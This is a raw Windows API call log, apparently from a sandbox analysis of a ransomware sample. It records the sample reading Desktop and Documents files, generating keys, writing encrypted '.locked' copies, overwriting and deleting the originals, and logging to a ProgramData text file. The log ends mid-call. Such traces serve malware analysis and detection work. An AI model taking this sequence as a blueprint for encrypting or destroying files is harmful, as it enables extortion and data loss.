0x0 [0278.364] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0278.370] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0278.559] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0278.559] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1249ee94 | out: lpMode=0x1249ee94) returned 0 [0278.559] WriteFile (in: hFile=0x1bc, lpBuffer=0x123801c0*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x1249ee64, lpOverlapped=0x0 | out: lpBuffer=0x123801c0*, lpNumberOfBytesWritten=0x1249ee64*=0x36, lpOverlapped=0x0) returned 1 [0278.560] CloseHandle (hObject=0x1bc) returned 1 [0278.561] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\kY10RHpj1Ccj R.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\ky10rhpj1ccj r.png")) returned 1 [0278.779] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0278.931] SetEvent (hEvent=0x1d0) returned 1 [0278.931] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0278.949] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0279.018] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0279.018] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766010 | out: pbBuffer=0x12766010) returned 1 [0279.018] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0279.018] WriteFile (in: hFile=0x230, lpBuffer=0x125e7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x125e7000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0279.030] ReadFile (in: hFile=0x228, lpBuffer=0x13e14000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesRead=0x1239fd68*=0x12cf1, lpOverlapped=0x0) returned 1 [0279.034] WriteFile (in: hFile=0x230, lpBuffer=0x13e14000*, nNumberOfBytesToWrite=0x12cf1, lpNumberOfBytesWritten=0x1239fd74, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesWritten=0x1239fd74*=0x12cf1, lpOverlapped=0x0) returned 1 [0279.605] ReadFile (in: hFile=0x228, lpBuffer=0x13e14000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x13e14000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0279.605] CloseHandle (hObject=0x230) returned 1 [0279.920] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.203] CloseHandle (hObject=0x228) returned 1 [0280.203] SetEvent (hEvent=0x1d0) returned 1 [0280.203] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.310] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.441] SetEvent (hEvent=0x21c) returned 1 [0280.441] SetEvent (hEvent=0x184) returned 1 [0280.441] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.484] SetEvent (hEvent=0x1dc) returned 1 [0280.484] SetEvent (hEvent=0x214) returned 1 [0280.484] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.542] SetEvent (hEvent=0x1dc) returned 1 [0280.543] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.610] SetEvent (hEvent=0x190) returned 1 [0280.610] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.789] SetEvent (hEvent=0x184) returned 1 [0280.789] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0280.879] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.879] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0280.911] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0280.911] SetEvent (hEvent=0x190) returned 1 [0280.911] SetEvent (hEvent=0x134) returned 1 [0280.911] SetEvent (hEvent=0x198) returned 1 [0280.911] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0282.101] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0282.101] SetEvent (hEvent=0x150) returned 1 [0282.101] SetEvent (hEvent=0x134) returned 1 [0282.101] SetEvent (hEvent=0x198) returned 1 [0282.101] SetEvent (hEvent=0x190) returned 1 [0282.101] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0282.101] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8030 | out: pbBuffer=0x124a8030) returned 1 [0282.101] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0282.102] WriteFile (in: hFile=0x228, lpBuffer=0x1275f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x1275f000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0282.106] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0282.147] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0282.147] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0282.147] SetEvent (hEvent=0x198) returned 1 [0282.147] SetEvent (hEvent=0x190) returned 1 [0282.147] SetEvent (hEvent=0x134) returned 1 [0282.148] ReadFile (in: hFile=0x180, lpBuffer=0x173ac000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x173ac000*, lpNumberOfBytesRead=0x123a3d68*=0x10eed, lpOverlapped=0x0) returned 1 [0282.150] WriteFile (in: hFile=0x228, lpBuffer=0x173ac000*, nNumberOfBytesToWrite=0x10eed, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x173ac000*, lpNumberOfBytesWritten=0x123a3d74*=0x10eed, lpOverlapped=0x0) returned 1 [0282.152] ReadFile (in: hFile=0x180, lpBuffer=0x173ac000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x173ac000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0282.153] CloseHandle (hObject=0x228) returned 1 [0282.207] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0282.693] SetEvent (hEvent=0x150) returned 1 [0282.693] CloseHandle (hObject=0x180) returned 1 [0282.693] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0283.580] SetEvent (hEvent=0x21c) returned 1 [0283.580] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0283.794] SetEvent (hEvent=0x214) returned 1 [0283.794] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\1s4d3CDN.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\1s4d3cdn.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0283.794] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12623d9c | out: lpMode=0x12623d9c) returned 0 [0283.794] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\1s4d3CDN.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\1s4d3cdn.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0283.795] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12623d9c | out: lpMode=0x12623d9c) returned 0 [0283.795] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390260 | out: pbBuffer=0x12390260) returned 1 [0283.795] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8060 | out: pbBuffer=0x124a8060) returned 1 [0283.795] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702601 | out: pbBuffer=0x12702601) returned 1 [0283.795] WriteFile (in: hFile=0x1b0, lpBuffer=0x126ea000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12623d78, lpOverlapped=0x0 | out: lpBuffer=0x126ea000*, lpNumberOfBytesWritten=0x12623d78*=0x80, lpOverlapped=0x0) returned 1 [0283.796] SetEvent (hEvent=0x1b8) returned 1 [0283.796] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0283.885] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0283.938] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\YRFgwGf 0zYgcMX.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\yrfgwgf 0zygcmx.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0284.506] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0284.971] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1276de88 | out: lpMode=0x1276de88) returned 0 [0284.971] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0285.402] WriteFile (in: hFile=0x180, lpBuffer=0x17e9c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276de78, lpOverlapped=0x0 | out: lpBuffer=0x17e9c000*, lpNumberOfBytesWritten=0x1276de78*=0xfa000, lpOverlapped=0x0) returned 1 [0285.649] CloseHandle (hObject=0x180) returned 1 [0285.817] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0285.977] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\YRFgwGf 0zYgcMX.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\yrfgwgf 0zygcmx.flv")) returned 1 [0286.678] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0287.374] SetEvent (hEvent=0x104) returned 1 [0287.374] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0287.454] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0287.468] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\CX3dvz.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cx3dvz.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0287.468] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0287.468] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\CX3dvz.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cx3dvz.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0287.469] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0287.469] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0287.469] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392040 | out: pbBuffer=0x12392040) returned 1 [0287.469] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0287.470] WriteFile (in: hFile=0x1c8, lpBuffer=0x125eb000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x125eb000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0287.471] SetEvent (hEvent=0x134) returned 1 [0287.471] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0287.536] SetEvent (hEvent=0x22c) returned 1 [0287.536] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0287.621] SetEvent (hEvent=0x1dc) returned 1 [0287.621] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0287.805] SetEvent (hEvent=0x104) returned 1 [0287.805] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0295.351] SetEvent (hEvent=0x14c) returned 1 [0295.351] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0295.429] SetEvent (hEvent=0x14c) returned 1 [0295.429] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0295.471] SetEvent (hEvent=0x14c) returned 1 [0295.471] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0295.525] SetEvent (hEvent=0x14c) returned 1 [0295.525] SetEvent (hEvent=0x20c) returned 1 [0295.525] SetEvent (hEvent=0x12c) returned 1 [0295.525] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0295.559] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0295.592] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0296.210] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0296.323] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0297.336] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0297.375] SetEvent (hEvent=0x190) returned 1 [0297.375] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0297.488] SetEvent (hEvent=0x14c) returned 1 [0297.488] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0297.554] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ej4CnCJUCwn5 nF.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ej4cncjucwn5 nf.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0297.981] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0298.158] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x124a0e88 | out: lpMode=0x124a0e88) returned 0 [0298.158] WriteFile (in: hFile=0x1c8, lpBuffer=0x13d08000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a0e78, lpOverlapped=0x0 | out: lpBuffer=0x13d08000*, lpNumberOfBytesWritten=0x124a0e78*=0xfa000, lpOverlapped=0x0) returned 1 [0298.272] CloseHandle (hObject=0x1c8) returned 1 [0298.506] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Ej4CnCJUCwn5 nF.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\ej4cncjucwn5 nf.docx")) returned 1 [0299.736] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0299.760] SetEvent (hEvent=0x20c) returned 1 [0299.760] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0299.837] SetEvent (hEvent=0x104) returned 1 [0299.837] SetEvent (hEvent=0x20c) returned 1 [0299.837] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0303.756] SetEvent (hEvent=0x104) returned 1 [0303.756] SetEvent (hEvent=0x134) returned 1 [0303.756] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0303.872] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0303.874] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12623a24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x12623a24*=0xb) returned 1 [0303.894] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EPo8_m0ryn 6ACWfcC.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\epo8_m0ryn 6acwfcc.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0303.895] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12623d9c | out: lpMode=0x12623d9c) returned 0 [0303.895] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EPo8_m0ryn 6ACWfcC.doc.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\epo8_m0ryn 6acwfcc.doc.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0303.895] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x12623d9c | out: lpMode=0x12623d9c) returned 0 [0303.895] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c240 | out: pbBuffer=0x1234c240) returned 1 [0303.895] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8080 | out: pbBuffer=0x124a8080) returned 1 [0303.896] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0303.897] WriteFile (in: hFile=0x224, lpBuffer=0x1264d000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12623d78, lpOverlapped=0x0 | out: lpBuffer=0x1264d000*, lpNumberOfBytesWritten=0x12623d78*=0x80, lpOverlapped=0x0) returned 1 [0303.900] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0303.903] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0303.903] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0303.903] SetEvent (hEvent=0x12c) returned 1 [0303.903] SetEvent (hEvent=0x20c) returned 1 [0303.903] SetEvent (hEvent=0x104) returned 1 [0303.903] ReadFile (in: hFile=0x208, lpBuffer=0x1430c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12623d68, lpOverlapped=0x0 | out: lpBuffer=0x1430c000*, lpNumberOfBytesRead=0x12623d68*=0x1218e, lpOverlapped=0x0) returned 1 [0303.908] WriteFile (in: hFile=0x224, lpBuffer=0x1430c000*, nNumberOfBytesToWrite=0x1218e, lpNumberOfBytesWritten=0x12623d74, lpOverlapped=0x0 | out: lpBuffer=0x1430c000*, lpNumberOfBytesWritten=0x12623d74*=0x1218e, lpOverlapped=0x0) returned 1 [0303.913] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.134] ReadFile (in: hFile=0x208, lpBuffer=0x1430c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12623d68, lpOverlapped=0x0 | out: lpBuffer=0x1430c000*, lpNumberOfBytesRead=0x12623d68*=0x0, lpOverlapped=0x0) returned 1 [0304.134] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.170] CloseHandle (hObject=0x224) returned 1 [0304.178] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.387] CloseHandle (hObject=0x208) returned 1 [0304.387] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0304.388] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12623e94 | out: lpMode=0x12623e94) returned 0 [0304.388] WriteFile (in: hFile=0x208, lpBuffer=0x125ee0c0*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x12623e64, lpOverlapped=0x0 | out: lpBuffer=0x125ee0c0*, lpNumberOfBytesWritten=0x12623e64*=0x55, lpOverlapped=0x0) returned 1 [0304.388] CloseHandle (hObject=0x208) returned 1 [0304.390] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EPo8_m0ryn 6ACWfcC.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\epo8_m0ryn 6acwfcc.doc")) returned 1 [0304.518] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0304.519] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0304.519] SetEvent (hEvent=0x150) returned 1 [0304.520] SetEvent (hEvent=0x184) returned 1 [0304.520] SetEvent (hEvent=0x1b8) returned 1 [0304.520] SetEvent (hEvent=0x14c) returned 1 [0304.522] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0304.527] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.527] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0304.528] SetEvent (hEvent=0x104) returned 1 [0304.528] SetEvent (hEvent=0x14c) returned 1 [0304.528] SetEvent (hEvent=0x1b8) returned 1 [0304.528] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.529] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0304.529] SetEvent (hEvent=0x1b8) returned 1 [0304.529] SetEvent (hEvent=0x14c) returned 1 [0304.550] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\EPo8_m0ryn 6ACWfcC.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\epo8_m0ryn 6acwfcc.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0304.732] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.772] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12621e88 | out: lpMode=0x12621e88) returned 0 [0304.772] SetEvent (hEvent=0x1f0) returned 1 [0304.772] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.773] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.797] SetEvent (hEvent=0x1dc) returned 1 [0304.797] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.805] SetEvent (hEvent=0x14c) returned 1 [0304.805] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.807] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.807] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.812] SetEvent (hEvent=0x1f0) returned 1 [0304.812] SetEvent (hEvent=0x21c) returned 1 [0304.812] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0304.889] WriteFile (in: hFile=0x228, lpBuffer=0x133ea000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276de78, lpOverlapped=0x0 | out: lpBuffer=0x133ea000*, lpNumberOfBytesWritten=0x1276de78*=0xfa000, lpOverlapped=0x0) returned 1 [0304.912] CloseHandle (hObject=0x228) returned 1 [0305.023] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0305.549] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\L-u71CPit811c.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\l-u71cpit811c.xls")) returned 1 [0305.710] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0305.811] SetEvent (hEvent=0x12c) returned 1 [0305.811] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0305.812] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0305.816] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\eJiGd4u4uD5.pps.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ejigd4u4ud5.pps.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0305.816] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x125d9d9c | out: lpMode=0x125d9d9c) returned 0 [0305.816] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0305.816] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0305.816] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: 